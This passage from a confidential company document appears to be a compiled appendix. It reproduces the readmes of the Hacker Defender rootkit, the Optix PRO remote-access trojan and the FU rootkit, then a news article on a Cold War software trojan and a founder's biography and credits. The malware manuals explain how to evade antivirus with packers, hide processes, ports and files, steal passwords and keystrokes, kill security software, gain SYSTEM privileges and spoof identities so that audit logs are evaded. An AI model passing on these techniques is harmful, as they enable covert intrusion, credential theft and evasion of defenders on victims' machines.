>OPEN 0
Port number 0 opened.
>CLOSE 0
Port number 0 closed.
Or
>OPEN ALL
Port number 0 opened.
10) to save current settings and lists we can use SAVE command, this saves all to inifile (saving is also done by command EXIT
without DIS flag):
>SAVE
Saved successfully.
Open port is all what we need for data transfer. Now you can open your favorite explorer and type http://localhost:100/ as url. If no
problems you will see how main page on www.google.com is loaded.
First packets of connection can be delayed up to 5 seconds, but others are limited only by speed of server, your internet connection
speed and by redirector technology which is about 256 kBps in this version.
=====[ 6.2 Hooked API ]==== ===
List of API functions which are hooked:
Kernel32.ReadFile
Ntdll.NtQuerySystemInformation (class 5 a 16)
Ntdll.NtQueryDirectoryFile
Ntdll.NtVdmControl
Ntdll.NtResumeThread
Ntdll.NtEnumerateKey
Ntdll.NtEnumerateValueKey
Ntdll.NtReadVirtualMemory
Ntdll.NtQueryVolumeInformationFile
Ntdll.NtDeviceIoControlFile
Ntdll.NtLdrLoadDll
Ntdll.NtOpenProcess
Ntdll.NtCreateFile
Ntdll.NtOpenFile
Ntdll.NtLdrInitializeThunk
WS2_32.recv
WS2_32.WSARecv
Advapi32.EnumServiceGroupW
Advapi32.EnumServicesStatusExW
Advapi32.EnumServicesStatusExA
Advapi32.EnumServicesStatusA
Because of many simple questions on the board I realize to create a faq section in this readme. Before you ask about anything read
this readme twice and take special care to this section. Then read old messages on the board and after then if you still think you are
not able to find an answer for your question you can put it on the board.
1)
Q: I've download hxdef, run it and can't get a rid of it. How can I uninstall it if I can't see its process, service and files?
A: If you left default settings you can run shell and stop the service:
>net stop HackerDefender084
Hxdef is implemented to uninstall completely if you stop its service. This does the same as -:uninstall but you don't need to know
where hxdef is. If you changed ServiceName in inifile Settings, type this in your shell:
CONFIDENTIAL
Page 114 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
>net stop ServiceName
where ServiceName stands for the value you set to ServiceName in inifile. If you forgot the name of the service you can boot your
system from CD and try to find hxdef inifile and look there for ServiceName value and then stop it as above.
2)
Q: Somebody hacked my box, run hxdef and I can't get a rid of it. How can I uninstall it and all that backdoors that were installed on
my machine?
A: Only 100% solution is to reinstall your Windows. But if you want to do this you'll have to find the inifile like in question 1) above.
Then after uninstalling hxdef from your system go through inifile and try to find all files that match files in Hidden Table. Then you
should verify those files and delete them.
3)
Q: Is this program detected by antivirus software? And if yes, is there any way
to beat it?
A: Yes, and not only the exefile is detected, few antivirus systems also
detect inifile and also driver file may be detected. The answer for second question here is yes, you can beat it quite easily. On hxdef
home site you can find a tool called Morphine. If you use Morphine on hxdef exefile you will get a new exefile which can't be detected
with common antivirus systems. Inifile is also designed to beat antivirus systems. You can add extra characters to it to confuse
antivirus systems. See 4. Inifile section for more info. Also see included inifiles. There are two samples that are equal, but the first one
is using extra characters so it can't be detected by common antivirus systems. Probably the best way is to use UPX before you use
Morphine. UPX will reduce the size of hxdef exefile and Morphine will make the anti-antivirus shield. See Morphine readme for more
info about it.
4)
Q: How is that I can't connect to backdoor on ports 135/TCP, 137/TCP, 138/TCP, 139/TCP or 445/TCP when target box has them
open?
A: As mentioned in 5. Backdoor section of this readme backdoor need server with incoming buffer larger or equal to 256 bits. And also
system ports may not work. If you have a problem with find open port that works you can simply run netcat and listen on your own
port. You should add this netcat port to Hidden Ports in inifile then.
5)
Q: Is there any way to have hidden process which file on disk is visible?
A: No. And you also can't have a hidden file on disk of process which is visible in the task list.
6)
Q: How about hiding svchost.exe and others I can see in tasklist?
A: This is really bad idea. If you hide common system processes your Windows can crash very soon. With hxdef you don't need to
name your malicious files like svchost.exe, lsass.exe etc. you can name it with any name and add this name to Hidden Table to hide
them.
7)
Q: I'm using DameWare and i can see all your services and all that should be hidden. Is this the bug?
A: Nope. DameWare and others who use remote sessions (and or netbios) can see hidden services because this feature is not
implemented yet. It's a big difference between the bug and not implemented. See todo list on the web for things that are not
implemented yet.
8)
Q: But anyone can see my hidden files via netbios. What should I do?
A: Put your files deeply into the system directories or to directories that are not shared.
9)
Q: Backdoor client is not working. Everything seems ok, but after connecting I can't type anything and the whole console screen is
black. What should I do?
A: You probably use bad port for connecting. Hxdef tries to detect bad ports and disconnect you, but sometimes it is not able to detect
you are using bad port. So, try to use different port.
10)
Q: When will we get the new version?
A: Developers code this stuff in their free time. They take no money for this and they don't want to get the money for this. There are
only two coders right now and we think this is enough for this project. This mean coding is not as fast as microsoft and you should
wait and don't ask when the new version will be released. Unlike microsoft our product is free and we have good beta testers and we
test this proggie a lot, so our public version are stable.
11)
Q: net.exe command can stop hidden services, is this the bug?
A: Nope. It is not a bug, it is the feature. You still have to know the name of the service you want to stop and if it is hidden the only
who can know it is the rootkit admin. Don't be scared this is the way how to detect you.
12)
CONFIDENTIAL
Page 115 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Q: Is there any way to detect this rootkit?
A: Yes. There are so many ways how to detect any rootkit and this one is not (and can't be) exception. Every rootkit can be detected.
Only questions here are how is it difficult and did somebody make a proggie that can do it?
13)
Q: So, how is it difficult to detect hxdef. And did somebody make a proggie that can do it?
A: It is very very easy to detect this, but I don't know special tool that can tell you that there is hxdef on your machine right now.
14)
Q: So, how can I detect it?
A: I won't tell you this :)
15)
Q: Does the version number which starts with 0 mean that it is not stable version?
A: No, it means that there are few things that are not implemented yet and that the source is closed and under development.
16)
Q: When will you publish the source? I've read it will be with the version 1.0.0, but when?
A: I really don't know when. There are several things I want to implement before releasing 1.0.0. It can take a six months as well as a
year or longer.
17)
Q: I want to be the beta tester, what should I do?
A: You should write me the mail about how can you contribute and what are your abilities for this job and your experiences with beta
testing. But the chance to be a new beta tester for this project is quite low. Right now we have enough testers who do a good job. No
need to increase the number of them.
18)
Q: Is it legal to use hxdef?
A: Sure it is, but hxdef can be easily misused for illegal activities.
19)
Q: Is it possible to update machine with old hxdef with this version? Is it possible without rebooting the machine?
A: It isn't possible without rebooting the machine, but you can update it when you do a manual uninstall of that old version, reboot the
machine and install the new version.
20)
Q: Is it possible to update machine with this version of hxdef with a newer version I get in future? Is it possible without rebooting?
A: Yes! You can use -:uninstall to totally remove this version of hxdef without rebooting. Then simply install the new version.
21)
Q: Is it better to use -:uninstall or to use net stop ServiceName?
A: The preferred way is to use -:uninstall if you have the chance. But net stop will also does the stuff.
22)
Q: I really love this proggie. Can I support your work with a little donation?
A: We don't need it, but we will be you give your money to any of those beneficent organizations in your country and write us the mail
about it.
23)
Q: Is there any chance to hide C:\temp and not to hide C:\winnt\temp?
A: No. Create your own directory with a specific name and put it to the Hidden Table.
24)
Q: I can see the password in inifile is plaintext! How is this possible?
A: You might think this is quite insecure way to store password but if you hide your inifile nobody can read it. So, it is secure. And it is
easy to change anytime and you can use -:refresh to change the password easily.
25)
Q: If I have a process that is in Hidden Table and it listens on a port, will this port be automatically hidden or should I put it to Hidden
Ports?
A: Only hidden ports are those in Hidden Ports list. So, yes, you should put it in to Hidden Ports.
An original archive of Hacker defender v0.8.4 contains these files:
hxdef084.exe
hxdef084.ini
hxdef084.2.ini
bdcli084.exe
rdrbs084.exe
readmecz.txt
readmeen.txt
readmefr.txt
70 144 b
3 872 b
3 695 b
26 624 b
49 152 b
34 864 b
35 375 b
38 296 b
- program Hacker defender v0.8.4
- inifile with default settings
- inifile with default settings, variant 2
- backdoor client
- redirectors base
- Czech version of readme file
- this readme file
- French version of readme file
CONFIDENTIAL
Page 116 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Optix PRO
Disclaimer:
The Creator(s) of Optix PRO or ANY Programs by EES members take NO responsibility for the way you use any of their programs.
The files and anything else in this release are for private purposes only and SHOULD ONLY BE USED BY YOURSELF ON YOUR
OWN COMPUTER! If you do not agree to these terms, delete this software NOW!
Optix PRO v1.32
1.INTRO
Well, this is it, the next release of Optix PRO. It isn’t that hard to use, layout:
.\Client\Client.exe = Client
.\Builder\Builder.exe = Builder = Program used to build server files!
WARNING: DO NOT RUN THE FILE(s) THAT YOU CREATE WITH BUILDER.EXE – THESE FILES ARE THE ONES INTENDED TO
RUN ON THE REMOTE COMPUTER THAT YOU WANT TO REMOTELY ADMINISTRATE, NOT YOUR OWN!!!!
Quick Start Tutorial:
1) Open Builder
2) Click"Build/Create Server:" button
3) Save Server as "server.exe"
4) Click UPX Packing
5) Click OK
6) Run Server.exe on the computer you wish to administrate
7) Open Client
8) Type in IP Address of other computer
9) Hit the Green Button in top-right hand corner to connect!
To find out exactly how to use a particular part of the program, simply hover your mouse button over the face of a button, control etc.
and a "help hint" will appear instructing you as to the purpose of that particular field/button etc.
UPX Packing is automated in the server build process if you wish to pack your file! to get an up-2-date copy of BlackFire's cgi logger
(cgi notification) go to:
http://www.bfndevelopment.com/
However a new logger (alternativecgilogger.zip) is also provided in this version. Advanced users check it out!
thanx to Rodger.girardin
2.FEATURE LIST
v1.32 - Client Side
COMPATIVBLE WITH ALL PAST SERVER VERSIONS! in a limited way! (own risk)
Client SOCKS 4/5 Support
Power Options - logoff,suspend,reboot,shutdown etc.
Server Information - Get info about builder settings
File Manager
Process Manager
Windows Manager
Registry Manager
FTP Manager
SOCKS 4/5 Server
Remote IP Scanner
Port Redirect
Application Redirect
Message Box
Matrix Chat (Client-2-vic)
Client-2-Client chat
CONFIDENTIAL
Page 117 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Computer Information
Get Passwords - (RAS/Cached - 9x and AIM)
Online Key Logger - (now window titles)
Screen Capture with left click mouse manipulation
Keyboard Manipulation - (more advanced)
Cam Capture
SendKeys - old version of SendKeys for older servers
Humor normals - Flash keyboard lights, Monitor on/off, Disable keyboard/mouse etc.
Humor Screen Printer - print text to their screen!
v1.32 - Server Side
COMPATIBLE WITH ALL PREVIOUS CLIENT VERSIONS! in a limited way! (own risk)
Configurable:
Notification Information Separators
IP Address Separator
Info included in any Notification
Idenfitication Name
Server Port
Server Password
Fake Error
Server Icon
Registry Run startup
Registry RunServices startup
win.ini startup
system.ini startup
s7 special method startup!
Server File Name
Start Directory (windir/sysdir)
Melt Server
Unlimited ICQ Number Notification
Unlimited CGI Script Notification
Unlimited MSN Account Notification
Unlimited IRC Server/channel Notification
Unlimited PHP Script Notification
Unlimited SMTP Notification
Toggling killing of in-built exe/service list for firewalls
Toggling killing of in-built exe/service list for Anti-Virus
Toggling killing of in-built exe/service list for packages classified as both anti-virus and firewall!
Unlimited Number of custom exe's to kill
Unlimited Number of custom services to kill
***ENHANCED TECHNOLOGY OPTIONS*** - File Name and Registry Value CLOAKING!
Easily Automated UPX Packing if needed.
Option for unpacked or packed server with your own packer if wanted (instructions clear)
CONFIDENTIAL
Page 118 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Fu RootKit
Program: fu.exe and msdirectx.sys Written by: fuzen_op
Description:
fu.exe and msdirectx.sys work as one. fu.exe passes down parameters as IOCTL's to the msdirectx.sys driver. As such, once the
driver is loaded, you do not need any special privilege to run fu.exe. msdirectx.sys is the driver and does all the work of fu.exe. The
driver is never unloaded until reboot. You can use whatever methods you like to load the driver such as SystemLoadAndCallImage
suggested by Greg Hoglund.
The driver is named msdirectx.sys. It is a play on Microsoft's DirectX and is named this to help hide it. (A future tool will hide it
completely!)
The FU rootkit can now hide any named driver in a manner similar to the way it hides processes. All the code to do this is in the user
land program (fu.exe) and the corresponding driver (msdirectx.sys). This functionality is not exposes to the regular user when showing
the Usage of FU. You must read the fu.exe code yourself to determine the parameters to pass to hide drivers. The reason for this is
that it uses a hard coded address that has only been tested on two machines. Look for MyPsLoadedModuleList in the fu.exe code.
Change it as necessary. If you want to send IOCTL's to a driver, you need a handle to it. FU makes no effort to hide or delete the
symbolic link used to open a handle to the driver to be hidden. You could add this code easily though if you wanted. The
msdirectx.sys driver should just delete the symbolic link while it is hiding the driver.
The driver has many uses. It can change the groups on any process. So, you could give your process System by typing:
fu -pss #process_pid System
It can also hide a process. Type:fu -ph #process_pid
At times you may want to "adjust" the privileges on a particular process. type: fu -prs #process_pid SeDebugPrivilege
You will need to type the specific privileges you want, but no worries I have listed them in ListPrivileges.txt.
Another feature is msdirectx.sys can change the AUTH_ID on any process. This can be used to impersonate another logon session
so that Windows Auditing etc. does not know what user really performed the actions you choose to take with the process.
Type:
fu -pas #process_pid
The process specified now looks like System in the Event Viewer, etc. You can recompile it to use Anonymous_Logon, LocalService,
or NetworkService instead of System. See Rootkit.h.
The driver does all this by Direct Kernel Object Manipulation (TM)!! No worries about do I have permission to that process, token, etc.
If you can load a driver once, you are golden! Also, it does not use "hooking" techniques. Hooking is easily detectable. FU is much
better. It just writes directly to memory because it understands the structures inside and out.
Program Usage:
fu
[-pl] #number to list the first #number of processes
[-ph] #PID to hide the process with #PID
[-pas] #PID to set the AUTH_ID to SYSTEM on process #PID.
Use this to impersonate other people when you do things. Note: You can recompile it to use Anonymous_Logon, LocalService, or
NetworkService instead of System. See Rootkit.h.
[-prl] to list the available privileges
[-prs] #PID #privilege_name to set privileges on process #PID
[-pss] #PID #account_name to add #account_name SID to process #PID token
Caveat: The binaries I have included will only run on Windows 2000/XP. See above. You will definitely have to recompile for NT
because the kernel in 2000/XP exports except_handler3 and NT does not so the driver is not compatible across all three.
See the note above if you wish to hide drivers.
WE ARE MODIFYING KERNEL STRUCTURES (OBJECTS) DIRECTLY IN MEMORY. AS SUCH, AT TIMES IT CAN CAUSE A
BLUESCREEN. I HAVE SEEN IT HAPPEN, BUT I WOULD SAY IT IS 98% TO 99% STABLE. IT ALL DEPENDS ON WHAT YOU
ARE DOING AT THE TIME.
CONFIDENTIAL
Page 119 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Explosive Cold War Trojan has lessons for Open Source exporters
By Andrew Orlowski in San Francisco
Posted: 16/03/2004 at 00:49 GMT
China has irked US wireless manufacturers by insisting that they conform to the PRC's encryption
technology, we reported last week. Some commentators have castigated China for protecting its own
fledgling tech industry. But that excludes the country's very understandable security concerns.
A reminder of how important these are came last week with a revelation from the Cold War era,
contained in a new book by a senior US national security official. Thomas Reed's At The Abyss
recounts how the United States exported control software that included a Trojan Horse, and used the
software to detonate the Trans-Siberian gas pipeline in 1982. The Trojan ran a test on the pipeline
that doubled the usual pressure, causing the explosion. Reed was Reagan's special assistant for
National Security Policy at the time; he had also served as Secretary of the Air Force from 1966 to
1977 and was a former nuclear physicist at the Lawrence Livermore laboratory in California. The
software subterfuge was so secret that Reed didn't know about it until he began researching the book,
20 years later.
The scheme to plant bugs in Soviet software was masterminded by Gus Weiss, who at the time was
on the National Security Council and who died last year. Soviet agents had been so keen to acquire
US technology, they didn't question its provenance.
"[CIA Director] Bill Casey at Weiss at the NSC decided to help the Russians with their shopping.
Every piece of software would have an added ingredient," said Reed to NPR's Terry Gross last week.
The software sabotage had two effects, explains Reed. The first was economic. By creating an
explosion with the power of a three kiloton nuclear weapon, the US disrupted supplies of gas and
consequential foreign currency earnings. But the project also had important psychological
advantages in the battle between the two superpowers.
"By implication, every cell of the Soviet leviathan might be infected," he writes. "They had no way
of knowing which equipment was sound, which was bogus. All was suspect, which was the intended
endgame for the entire operation."
Tools you can trust
The two great trading powers, China and the USA, are not currently engaged in a Cold War. But
does that mean that the Cold War lessons are invalid?
Closed source software vendors such as Oracle and Microsoft hardly need to be reminded of the
delicacy of the subject. A year ago the PRC signed up for Microsoft's Government Security
Program, which gives it what Redmond describes as "controlled access" to Windows source code.
But the Windows source itself doesn't guarantee that versions of Windows will be free of Trojans.
Governments need access to the toolchain - to the compilers and linkers used to generate the code as that's where Trojans can be introduced. Without tools source, licensees are faced with the prospect
of tracing billions of possible execution paths, a near impossible task.
Until the closed source vendors open up the toolchain, and use that toolchain for verifiable builds,
this is one area where software libre will have a lasting advantage.
CONFIDENTIAL
Page 120 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
PAUL E. FULLWOOD - FOUNDER
Paul Fullwood is one of the founders of
LoudWolf Holdings Ltd. He is currently President
& COO Digital Animation Inc. A founding
partner of Edison Research Labs and chairman of
The First Fruits Charities Inc.
He is a board member of various other companies
including Digital Imagination Inc. (Sister
company to Digital Animation)
Biography:
Born In England, Paul founded his first corporation in 1979, Developing software for the then
emerging microcomputer industry, In 1984 He sold this business and emigrated to the United States
where, he created the Worlds, first Interactive game dubbed Inter-Acter, subsequently, he founded
another company creating video game software for the fledgling gaming industry and providing
advanced hardware and software for the television and film industries. In 1991 Paul founded one of
the first Multi-Media studios in Los Angeles California. Where he pioneered the concept of video
games on CD. In 1996 Paul began work with a group of industry luminaries in the creation of the
Lightspan Partnership, where he created the software for the first ever complete K-12 computer
based curriculum, for Kindergarten through graduation. In 1999 Paul Moved to Boston to take on
the role of running the second largest group of Multi-Media studios in the World with Hasbro Inc. In
2000 Paul switched back to his entrepreneurial roots and moved to Silicon Valley, California to be a
part of the Silicon Valley Internet boom. There, he was the visionary mind behind Paradigm3 and
Digital Animation Inc. Creating Innovative cutting-edge products that focused on fundamental new
technologies. In 2003 Paul relocated to Central California to build his latest business, focusing on
what Paul perceives to be the next big wave of technological innovation, that of creating computer
security systems for the 21st century.
2001-2004 Digital Animation Inc. – Founder – President & COO Digital Animation Inc. is a private
venture capital funded company 1.1M Dollars. Based in Silicon Valley. Focusing on advanced
Internet compression technology for the transmission of animated entertainment educational video
over the Internet. Responsibilities: Concept development, day to day running of the company, raising
venture funding, developing technical and marketing strategies, budgeting. Technical focus: C++
video encoding tools and C++ client side decompression technology.
2000 –2001 Paradigm3 Internet Software Inc.- Consultant – Acting COO. Paradigm3 is a venture
capital funded (Asia-tech Ventures) Internet software company focusing on Internet infrastructure
tools for metering and monitoring applications for Application Service Providers. Responsibilities:
day to day running of the company, raising venture funding, developing technical and marketing
strategies, budgeting. Technical focus: Java, Enterprise Java, Visual Café- Oracle 8 Data Base.
CONFIDENTIAL
Page 121 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
1999 to 2000 Hasbro Interactive – Vice President, Head of Worldwide Studios. Hasbro is a
publicly traded 3.7 Billion-Dollar company. Based in Pawtucket, RI. Responsible for Hasbro
Interactive studios (Formerly Microprose) World-wide, developing products under Microprose,
Atari, Avalon Hill, Wizards of the Coast, and Hasbro brands. Responsible for managing studios,
with an overall staff of 230 persons, and budgets in the 26M range. Additionally responsible for the
3rd party software development for the Microprose and Atari brands, on Sony PlayStation, PC, Sega
Dreamcast and PS2.
1996 – 1998 The Lightspan Partnership Inc.: Vice President - Product Development.
Venture capital funded, (120M), Now a publicly traded company with a market cap of $100 Million
Dollars. VCs- Kleiner Perkins, Accel Partners, Microsoft, Tribune, TCI, Comcast, and Institutional
Venture Partners. Developing Sony PlayStation, PC and MAC Multi-Media titles for sale to public
schools nationwide. Responsible for strategic business & technical decisions company-wide,
product development and preparation for IPO. Reporting to the President with a staff of 75-120.
Budgets in the 6 to 9 M range, responsible for all outside business affairs relationships and all outsource software development contracts. (6 M Dollars in 1996).
1991 to 1996
Accent Media Productions Inc.: Founder - President - CEO.
Multi-Media, CD ROM, multi-platform development company founded in 1991, grossing
approximately 3M annually with 20 - 30 employees. Published titles: The Joker’s Wild!, Jeopardy!,
The Joker’s Wild Junior, Geo Safari, Varuna’s Forces. Platforms: Sony PlayStation, Sega Saturn,
Philips CD-I, Atari Jaguar, Windows PC & Macintosh. Overall creative and decision-making
responsibility. Including design, production and marketing.
1981 to 1991
Startech (US) Computer Consultancy Inc.: Founder - President - CEO.
Television production and technology company engaged in the development, presentation and sale
of numerous television shows. Also providing television creative and technical consultancy
services. Specializing in concept development, computer technology, graphics design, electronic
engineering and Multi-Media adaptations.
1979 to 1981
Startech Computer Consultancy Limited: Founder - Managing Director - CEO.
Software development company engaged in vertical market software development, entertainment
software development, and software publishing and publishing. Developed and published software
in both the U.K. and U.S. Platforms: Apple II, Macintosh, PC, Commodore 64, VIC 20, and Amiga.
CONFIDENTIAL
Page 122 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
PAUL FULLWOOD – KEY SKILLS
Expert in state-of-the-art security methodologies, focused on theoretical evaluation of
emerging threat vectors. Experienced in design and evaluation of hardware based security systems
for high value intellectual property.
Expert in producing multiple large software projects, including; creative concepts, rights
sourcing, software design, financing, venture capital sourcing, business affairs, interactive script
writing, sales, budgeting, scheduling, milestone creation, management of programming and art
teams, video production directing and editing. Very well “networked” in the security, television and
movie industry. Well connected in the Multi-Media industry and with other content providers.
In depth experience in the management of cutting edge technical development, including
definitions of concept, team building, product development and testing.
For the last seven years, in depth executive experience managing a very large technical and
creative staff in a large corporations. Strategic planning, business affairs, budgeting, schedules,
business accounting, tax strategies, cash management, business forecasting, creation of business
plans and marketing. Fully conversant with HR issues, investor relations, pre IPO positioning, risk
factors, IPO publicity and road shows.
Over 25 years in the software business with experience as a start-up founder, game designer,
developer, and programmer, of entertainment and educational software.
Adept in business affairs, contracts of all types including software licensing, distribution
contracts, marketing agreements, strategic alliances, content licenses, talent contracts, marquee &
brand name licensing, core technology licenses, source code deals, localization issues etc.
Video production management. Multi-media out-source contract negotiation & creation,
intellectual property, licensing, reproduction, localization, derivatives and source code issues.
Managed the production of 3D real time polygon engines with texture mapping, for use as a
basis for multiple games. Experience in the creation of world editor tools for use in software
engines. Experience in developing Multi-Media titles for multiple platforms simultaneously,
utilizing state of the art cross platform development engines.
Developed cross platform development engines and tools (Sony PlayStation and PC).
Experience in managing companies involved in the production of high volume Multi-Media
products. Produced over 200 large budget CDs in two years. On both Sony PlayStation and PC.
Experience with video streaming and networking technology.
CONFIDENTIAL
Page 123 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
PAUL FULLWOOD - AWARDS
1995
Silver “Cindy” award, The Joker’s Wild!
“Emmy” nomination for “Masters of the Maze” Children’s television show.
1996
Parenting Magazine. Best children’s Multi-Media product of the year: The Joker’s Wild!
National Parenting association, Best Multi-Media product: The Joker’s Wild! Junior.
The New York Festival World Medal Winner, Interactive Media category: Timeless Math 1, Maya Adventure Search
and Rescue.
1997
The 5th Annual Los Angeles International Animation Competition finalist, Best Animation Produced for Game
Platforms category: Timeless Math Adventure 4 Lunar Base.
The American Electronics Association Finalist, Software category.
Winner, The Jerry Crews Award The Greater San Diego Reading Association.
Telly award Silver, Education category: K9.5 – Live in Airedale.
Telly award winner, Education category: Timeless Math Adventure 4 Lunar Base.
New York Festival of Animation / Bronze Medal Winner, Math Enrichment category: Secret of Googol.
Telly award finalist, Sales Presentation category: Lightspan Animation Sampler.
1998
Global Information Infrastructure Awards (GII) finalist, Education category: The Lightspan Network.
Telly award finalist, Children’s audience category: Lightspan Challenge Timeless Math, Maya Adventure.
Silver “Cindy” award, Education K-12 category: K9.5 Live in Airedale.
Gold “Cindy” award, Education K-12 category: Timeless Math 4.
Gold “Cindy” award, Graphics, Animation, Visual Effects category: Secret of Googol, Googol Gulch.
Gold “Cindy” award, Education/Science & Math category: P.K’s Place Carlos at the Races.
Telly award finalist, Multimedia category: Timeless Math Lunar Base Adventure 4.
Telly award finalist, Multimedia category: P.K’s Place Hoopo at Sea.
Telly award winner Education category: Timeless Math, Lunar Base.
Telly award finalist category, Children’s Audience: Timeless Math, The Maya Adventure.
1999
Silver “Omni” award winner, Education category: Road Writer.
Bronze “Omni” award winner, Education category: Timeless Math Music Video.
Bronze “Omni” award winner, Education category: Timeless Math Space Flight Rescue.
Bronze Telly award winner, animation category: Road Writer.
Bronze Telly award winner, Animation category: Timeless Math Music Video.
Bronze Telly award winner, Animation category Timeless Math Space Flight Rescue.
Professional organizations
Charter Member of the Academy of Digital Arts and Sciences
Member of the Computer Game Developers Association.
Member AMA
CONFIDENTIAL
Page 124 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
PAUL FULLWOOD – PUBLISHED TITLES
TITLE
Meteor
Ski Run
Backgammon
Painter
Bunny
Arcadia
Cosmiads
Vicman
Vic Panic
The Joker’s Wild!
Jeopardy!
The Joker’s Wild Junior
Geo Safari
Varuna’s Forces
Mars Moose series
Cosmic Quest (3 CDs)
Timeless Math series (7 CDs)
Timeless Math Jade Trade
Liquid Books series (6 CDs)
Googol series (8 CDs)
PK
Kazmania series (4 CDs)
Creative Voyage series
Math Tools
Road Writer
Quaddle series (3 CDs)
Walkabout series
Math On The Move
STRATES series (8 CDs)
Affiliate Titles (98 CDs)
Math Gallery (2 CDs)
Mech Warrior III
Star Trek Birth of Federation
The Next Tetris
The Company Guide
Worms Armageddon
Gunship III
PLATFORM(s)
VIC20 Commodore 64
VIC20 Commodore 64
Commodore 64
Commodore 64-128
Commodore 64
VIC20
VIC20
VIC20
VIC20
CD-I
CD-I
CD-I
PC
PC, SEGA, SONY
PC, MAC, SONY
PC, MAC, SONY
PC, MAC, SONY
PC, MAC, SONY
PC, MAC, SONY
PC, MAC, SONY
PC, MAC, SONY
PC, MAC, SONY
PC, MAC, SONY
PC, MAC, SONY
PC, MAC, SONY
PC, MAC, SONY
PC, MAC, SONY
PC, MAC, SONY
PC, MAC, SONY
PC, MAC, SONY
PC, MAC, SONY
PC
PC
PC, SONY
PC
PC, SONY
PC
PARTICIPATION
Programmer/Creator/Producer
Programmer/Creator/Producer
Programmer/Creator/Producer
Programmer/Creator/Producer
Programmer/Creator/Producer
Publisher
Publisher
Publisher
Publisher
Producer/Creator/Developer
Producer/Creator/Developer
Producer/Creator/Developer
Producer/Developer
Producer/Creator/Developer
Senior Executive
Senior Executive
Senior Executive
Senior Executive
Senior Executive
Senior Executive
Senior Executive
Senior Executive
Senior Executive
Senior Executive
Senior Executive
Senior Executive
Senior Executive
Senior Executive
Senior Executive
Senior Executive
Senior Executive
Senior Executive
Senior Executive
Senior Executive
Senior Executive
Senior Executive
Senior Executive
CONFIDENTIAL
Page 125 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
PAUL FULLWOOD – TELEVISION & MOVIE CREDITS
TITLE
Win Lose or Draw
Silver Spoons
The Facts of Life
Pictionary
Hot Potato
The Jokers Wild!
Chain Letters
Off The Wall
Eavesdroppers
2nd Honeymoon
Top Secret
Strike It Rich
Break The Bank
Couch Potatoes
Inter-Acter
Bumper Stumpers
Bumper Stumpers
Talk About
In Other Words
Banko
The Joker’s Wild!
All About US
Strike it Lucky
Divorce Wars
Una Nunca Saba
All About The Opposite sex
Challengers
The Marsha Warfield Show
Talk About (UK)
Talk About France
Brains & Brawn
L’arch de Ore
Critical Decisions
Split Second
The Joker’s Wild!
The Hank Gathers Story
Talk About
Love & Sex Test
Labyrinth
Trashed!
Caesars Challenge
Startest
NOVA
Quicksilver
Free 4 All
Masters of the Maze
Majority Rules
Wheel of Fortune
Outback Adventures
PRODUCTION ENTITY
Kline & Friends Inc./Disney
Embassy Television
Embassy Television
Barry & Enright Productions
Barry & Enright Productions
Barry & Enright Productions
Yorkshire Television
Alan Landsberg Productions
Martindale Gilden Productions
Martindale Gilden Productions
Martindale Gilden Productions
Kline & Friends Inc.
Kline & Friends Inc.
Saban Productions.
Skip Alexander Productions
Barry & Enright Productions
Global Television Network
D.L. Taffner Productions
D.L. Taffner Productions
Barry & Enright Productions
Kline & Friends Inc.
Barry & Enright Productions
Thames Television England
Orion Television
Inter telespan
Barry & Enright Productions
Buena Vista/Dick Clark
Kline & Friends Inc
Yorkshire Television
French Television
NBC Productions
French Television
Harry Friedman productions
Ralph Edwards Stu Billet Prod.
Kline & Friends Inc
Hallmark Hall of Fame Prod.
EIRE Irish Television
Hill Eubanks Productions
D.L. Taffner
MTV Networks
Stephen J. Cannell Prod.
Disney/ Buena Vista Prod.
WGBH Boston
Stone Stanley Productions
Stone Stanley Productions
Kline & Friends Productions
Dream Works
Columbia Tristar/ Sony
Becker Entertainment (AUS)
DETAIL
NBC series 3 years. + Syndi 3 yrs.
Network series 1 episode.
Network series 1 episode.
Syndicated series 13 weeks.
NBC Series 26 weeks, reruns.
Syndicated 9 Years, reruns.
Network series.
NBC network pilot.
Syndicated pilot.
Syndicated series CBC 13 wks.
CBS pilot.
Syndicated series 39 weeks.
Syndicated series 39 weeks.
Group W cable 20 weeks.
8 years Syndication.
3 Years USA network.
3 years Canadian TV.
Syndicated series 2 years.
CTV Canada 1 year.
Fox television pilot.
Syndicated pilot.
Lexington Broadcasting 1 year.
Network series 4 years.
Syndicated pilot.
Spanish series 26 weeks.
Series 9 weeks.
Syndicated series 52 weeks.
NBC series 39 weeks.
ITV network series two years.
Network series 26 weeks.
NBC network series 39 weeks.
Network series.
Pilot.
ABC pilot.
Syndicated series 36 weeks.
TV movie of the week.
Network series.
